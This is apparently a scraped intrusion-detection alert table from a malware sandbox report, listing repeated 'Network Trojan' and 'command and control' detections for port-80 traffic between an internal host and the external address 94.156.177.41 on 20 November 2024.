                2024-11-20T11:08:29.028327+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249177TCP
                2024-11-20T11:08:29.907682+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249178TCP
                2024-11-20T11:08:30.805867+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249179TCP
                2024-11-20T11:08:31.714780+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249180TCP
                2024-11-20T11:08:32.675345+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249181TCP
                2024-11-20T11:08:33.582195+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249182TCP
                2024-11-20T11:08:34.487728+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249183TCP
                2024-11-20T11:08:35.465753+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249184TCP
                2024-11-20T11:08:36.527085+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249185TCP
                2024-11-20T11:08:37.416957+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249186TCP
                2024-11-20T11:08:38.495121+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249187TCP
                2024-11-20T11:08:39.680093+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249188TCP
                2024-11-20T11:08:40.555349+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249189TCP
                2024-11-20T11:08:41.459392+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249190TCP
                2024-11-20T11:08:42.336116+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249191TCP
                2024-11-20T11:08:43.380664+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249192TCP
                2024-11-20T11:08:44.421860+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249193TCP
                2024-11-20T11:08:45.302895+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249194TCP
                2024-11-20T11:08:46.182741+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249195TCP
                2024-11-20T11:08:47.207849+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249196TCP
                2024-11-20T11:08:48.285688+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249197TCP
                2024-11-20T11:08:49.173575+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249198TCP
                2024-11-20T11:08:50.099688+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249199TCP
                2024-11-20T11:08:51.152685+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249200TCP
                2024-11-20T11:08:52.244531+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249201TCP
                2024-11-20T11:08:53.300040+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249202TCP
                2024-11-20T11:08:54.194268+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249203TCP
                2024-11-20T11:08:55.085830+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249204TCP
                2024-11-20T11:08:56.219924+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249205TCP
                2024-11-20T11:08:57.094558+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249206TCP
                2024-11-20T11:08:58.002455+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249207TCP
                2024-11-20T11:08:59.032141+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249208TCP
                2024-11-20T11:09:00.055343+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249209TCP
                2024-11-20T11:09:00.935498+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249210TCP
                2024-11-20T11:09:01.835581+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249211TCP
                2024-11-20T11:09:02.716563+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249212TCP
                2024-11-20T11:09:03.602441+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249213TCP
                2024-11-20T11:09:04.479679+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249214TCP
                2024-11-20T11:09:05.416646+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249215TCP
                2024-11-20T11:09:06.310839+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249216TCP
                2024-11-20T11:09:07.240286+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249217TCP
                2024-11-20T11:09:08.145630+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249218TCP
                2024-11-20T11:09:09.369820+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249219TCP
                2024-11-20T11:09:10.241617+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249220TCP
                2024-11-20T11:09:11.120984+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249221TCP
                2024-11-20T11:09:12.017444+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249222TCP
                2024-11-20T11:09:12.950526+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249223TCP
                2024-11-20T11:09:13.871527+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249224TCP
                2024-11-20T11:09:14.788393+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249225TCP
                2024-11-20T11:09:15.791292+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249226TCP
                2024-11-20T11:09:16.817569+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249227TCP
                2024-11-20T11:09:17.709675+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249228TCP
                2024-11-20T11:09:19.527073+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249229TCP
                2024-11-20T11:09:20.425799+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249230TCP
                2024-11-20T11:09:21.322527+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249231TCP
                2024-11-20T11:09:22.223852+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249232TCP
                2024-11-20T11:09:23.259068+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249233TCP
                2024-11-20T11:09:24.409463+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249234TCP
                2024-11-20T11:09:26.573856+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249235TCP
                2024-11-20T11:09:27.503716+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249236TCP
                2024-11-20T11:09:28.606457+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249237TCP
                2024-11-20T11:09:29.686788+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249238TCP
                2024-11-20T11:09:30.608399+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249239TCP
                2024-11-20T11:09:31.688133+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249240TCP
                2024-11-20T11:09:32.562183+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249241TCP
                2024-11-20T11:09:33.610429+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249242TCP
                2024-11-20T11:09:34.681360+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249243TCP
                2024-11-20T11:09:35.675754+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249244TCP
                2024-11-20T11:09:36.757976+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249245TCP
                2024-11-20T11:09:37.673948+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249246TCP
                2024-11-20T11:09:38.574890+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249247TCP
                2024-11-20T11:09:39.504812+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249248TCP
                2024-11-20T11:09:40.474031+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249249TCP
                2024-11-20T11:09:41.398933+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249250TCP
                2024-11-20T11:09:42.310054+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249251TCP
                2024-11-20T11:09:43.487717+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249252TCP
                2024-11-20T11:09:44.514314+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249253TCP
                2024-11-20T11:09:45.560204+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249254TCP
                2024-11-20T11:09:46.843780+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249255TCP
                2024-11-20T11:09:47.813495+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249256TCP
                2024-11-20T11:09:48.835847+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249257TCP
                2024-11-20T11:09:49.850273+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249258TCP
                2024-11-20T11:09:50.744961+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249259TCP
                2024-11-20T11:09:51.771158+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249260TCP
                2024-11-20T11:09:52.649859+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249261TCP
                2024-11-20T11:09:54.882822+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249262TCP
                2024-11-20T11:09:56.167364+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249263TCP
                2024-11-20T11:09:57.293293+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249264TCP
                2024-11-20T11:09:58.181717+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249265TCP
                2024-11-20T11:09:59.127573+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249266TCP
                2024-11-20T11:10:00.419064+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249267TCP
                2024-11-20T11:10:01.332375+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249268TCP
                2024-11-20T11:10:02.207700+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249269TCP
                2024-11-20T11:10:03.237104+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249270TCP
                2024-11-20T11:10:04.459383+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249271TCP
                2024-11-20T11:10:05.508922+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249272TCP
                2024-11-20T11:10:06.443859+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249273TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:19.578539+010020243131Malware Command and Control Activity Detected192.168.2.224916794.156.177.4180TCP
                2024-11-20T11:08:20.483471+010020243131Malware Command and Control Activity Detected192.168.2.224916894.156.177.4180TCP
                2024-11-20T11:08:21.399796+010020243131Malware Command and Control Activity Detected192.168.2.224916994.156.177.4180TCP
                2024-11-20T11:08:22.424479+010020243131Malware Command and Control Activity Detected192.168.2.224917094.156.177.4180TCP
                2024-11-20T11:08:23.353502+010020243131Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                2024-11-20T11:08:24.467559+010020243131Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                2024-11-20T11:08:25.379147+010020243131Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T11:08:26.297901+010020243131Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T11:08:27.189211+010020243131Malware Command and Control Activity Detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T11:08:28.082947+010020243131Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T11:08:29.023498+010020243131Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T11:08:29.900412+010020243131Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T11:08:30.800621+010020243131Malware Command and Control Activity Detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T11:08:31.709835+010020243131Malware Command and Control Activity Detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T11:08:32.666766+010020243131Malware Command and Control Activity Detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T11:08:33.577251+010020243131Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T11:08:34.478832+010020243131Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T11:08:35.458425+010020243131Malware Command and Control Activity Detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T11:08:36.517609+010020243131Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T11:08:37.408604+010020243131Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T11:08:38.490185+010020243131Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T11:08:39.675088+010020243131Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T11:08:40.550409+010020243131Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T11:08:41.450674+010020243131Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T11:08:42.331130+010020243131Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T11:08:43.375730+010020243131Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T11:08:44.416987+010020243131Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T11:08:45.294525+010020243131Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T11:08:46.174557+010020243131Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T11:08:47.202696+010020243131Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T11:08:48.276840+010020243131Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T11:08:49.168632+010020243131Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T11:08:50.089336+010020243131Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T11:08:51.147665+010020243131Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T11:08:52.239529+010020243131Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T11:08:53.295076+010020243131Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T11:08:54.189409+010020243131Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T11:08:55.078799+010020243131Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T11:08:56.212274+010020243131Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T11:08:57.089307+010020243131Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T11:08:57.994867+010020243131Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T11:08:59.024610+010020243131Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T11:09:00.048816+010020243131Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T11:09:00.930538+010020243131Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T11:09:01.830392+010020243131Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T11:09:02.711590+010020243131Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T11:09:03.597153+010020243131Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T11:09:04.474795+010020243131Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T11:09:05.407507+010020243131Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T11:09:06.303457+010020243131Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T11:09:07.233860+010020243131Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T11:09:08.137816+010020243131Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T11:09:09.364690+010020243131Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T11:09:10.235026+010020243131Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T11:09:11.115424+010020243131Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T11:09:12.012535+010020243131Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T11:09:12.941472+010020243131Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T11:09:13.866235+010020243131Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T11:09:14.783519+010020243131Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T11:09:15.786102+010020243131Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T11:09:16.810037+010020243131Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T11:09:17.702031+010020243131Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T11:09:19.526453+010020243131Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T11:09:20.420637+010020243131Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T11:09:21.314955+010020243131Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T11:09:22.217616+010020243131Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T11:09:23.254109+010020243131Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T11:09:24.404461+010020243131Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T11:09:26.308393+010020243131Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                2024-11-20T11:09:27.498635+010020243131Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T11:09:28.601487+010020243131Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T11:09:29.678802+010020243131Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                2024-11-20T11:09:30.598870+010020243131Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T11:09:31.681516+010020243131Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T11:09:32.557261+010020243131Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T11:09:33.605446+010020243131Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T11:09:34.675390+010020243131Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T11:09:35.668171+010020243131Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T11:09:36.753021+010020243131Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T11:09:37.666072+010020243131Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T11:09:38.569971+010020243131Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T11:09:39.499696+010020243131Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T11:09:40.469131+010020243131Malware Command and Control Activity Detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T11:09:41.391468+010020243131Malware Command and Control Activity Detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T11:09:42.303354+010020243131Malware Command and Control Activity Detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T11:09:43.481518+010020243131Malware Command and Control Activity Detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T11:09:44.496461+010020243131Malware Command and Control Activity Detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T11:09:45.552873+010020243131Malware Command and Control Activity Detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T11:09:46.836511+010020243131Malware Command and Control Activity Detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T11:09:47.805329+010020243131Malware Command and Control Activity Detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T11:09:48.830988+010020243131Malware Command and Control Activity Detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T11:09:49.845370+010020243131Malware Command and Control Activity Detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T11:09:50.739485+010020243131Malware Command and Control Activity Detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T11:09:51.764421+010020243131Malware Command and Control Activity Detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T11:09:52.644424+010020243131Malware Command and Control Activity Detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T11:09:54.860925+010020243131Malware Command and Control Activity Detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T11:09:56.162434+010020243131Malware Command and Control Activity Detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T11:09:57.285140+010020243131Malware Command and Control Activity Detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T11:09:58.170473+010020243131Malware Command and Control Activity Detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T11:09:59.122658+010020243131Malware Command and Control Activity Detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T11:10:00.411828+010020243131Malware Command and Control Activity Detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T11:10:01.322717+010020243131Malware Command and Control Activity Detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T11:10:02.202639+010020243131Malware Command and Control Activity Detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T11:10:03.219949+010020243131Malware Command and Control Activity Detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T11:10:04.454187+010020243131Malware Command and Control Activity Detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T11:10:05.503902+010020243131Malware Command and Control Activity Detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T11:10:06.403992+010020243131Malware Command and Control Activity Detected192.168.2.224927394.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:19.578539+010020243181Malware Command and Control Activity Detected192.168.2.224916794.156.177.4180TCP
                2024-11-20T11:08:20.483471+010020243181Malware Command and Control Activity Detected192.168.2.224916894.156.177.4180TCP
                2024-11-20T11:08:21.399796+010020243181Malware Command and Control Activity Detected192.168.2.224916994.156.177.4180TCP
                2024-11-20T11:08:22.424479+010020243181Malware Command and Control Activity Detected192.168.2.224917094.156.177.4180TCP
                2024-11-20T11:08:23.353502+010020243181Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                2024-11-20T11:08:24.467559+010020243181Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                2024-11-20T11:08:25.379147+010020243181Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T11:08:26.297901+010020243181Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T11:08:27.189211+010020243181Malware Command and Control Activity Detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T11:08:28.082947+010020243181Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T11:08:29.023498+010020243181Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T11:08:29.900412+010020243181Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T11:08:30.800621+010020243181Malware Command and Control Activity Detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T11:08:31.709835+010020243181Malware Command and Control Activity Detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T11:08:32.666766+010020243181Malware Command and Control Activity Detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T11:08:33.577251+010020243181Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T11:08:34.478832+010020243181Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T11:08:35.458425+010020243181Malware Command and Control Activity Detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T11:08:36.517609+010020243181Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T11:08:37.408604+010020243181Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T11:08:38.490185+010020243181Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T11:08:39.675088+010020243181Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T11:08:40.550409+010020243181Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T11:08:41.450674+010020243181Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T11:08:42.331130+010020243181Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T11:08:43.375730+010020243181Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T11:08:44.416987+010020243181Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T11:08:45.294525+010020243181Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T11:08:46.174557+010020243181Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T11:08:47.202696+010020243181Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T11:08:48.276840+010020243181Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T11:08:49.168632+010020243181Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T11:08:50.089336+010020243181Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T11:08:51.147665+010020243181Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T11:08:52.239529+010020243181Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T11:08:53.295076+010020243181Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T11:08:54.189409+010020243181Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T11:08:55.078799+010020243181Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T11:08:56.212274+010020243181Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T11:08:57.089307+010020243181Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T11:08:57.994867+010020243181Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T11:08:59.024610+010020243181Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T11:09:00.048816+010020243181Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T11:09:00.930538+010020243181Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T11:09:01.830392+010020243181Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T11:09:02.711590+010020243181Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T11:09:03.597153+010020243181Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T11:09:04.474795+010020243181Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T11:09:05.407507+010020243181Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T11:09:06.303457+010020243181Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T11:09:07.233860+010020243181Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T11:09:08.137816+010020243181Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T11:09:09.364690+010020243181Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T11:09:10.235026+010020243181Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T11:09:11.115424+010020243181Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T11:09:12.012535+010020243181Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T11:09:12.941472+010020243181Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T11:09:13.866235+010020243181Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T11:09:14.783519+010020243181Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T11:09:15.786102+010020243181Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T11:09:16.810037+010020243181Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T11:09:17.702031+010020243181Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T11:09:19.526453+010020243181Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T11:09:20.420637+010020243181Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T11:09:21.314955+010020243181Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T11:09:22.217616+010020243181Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T11:09:23.254109+010020243181Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T11:09:24.404461+010020243181Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T11:09:26.308393+010020243181Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                2024-11-20T11:09:27.498635+010020243181Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T11:09:28.601487+010020243181Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T11:09:29.678802+010020243181Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
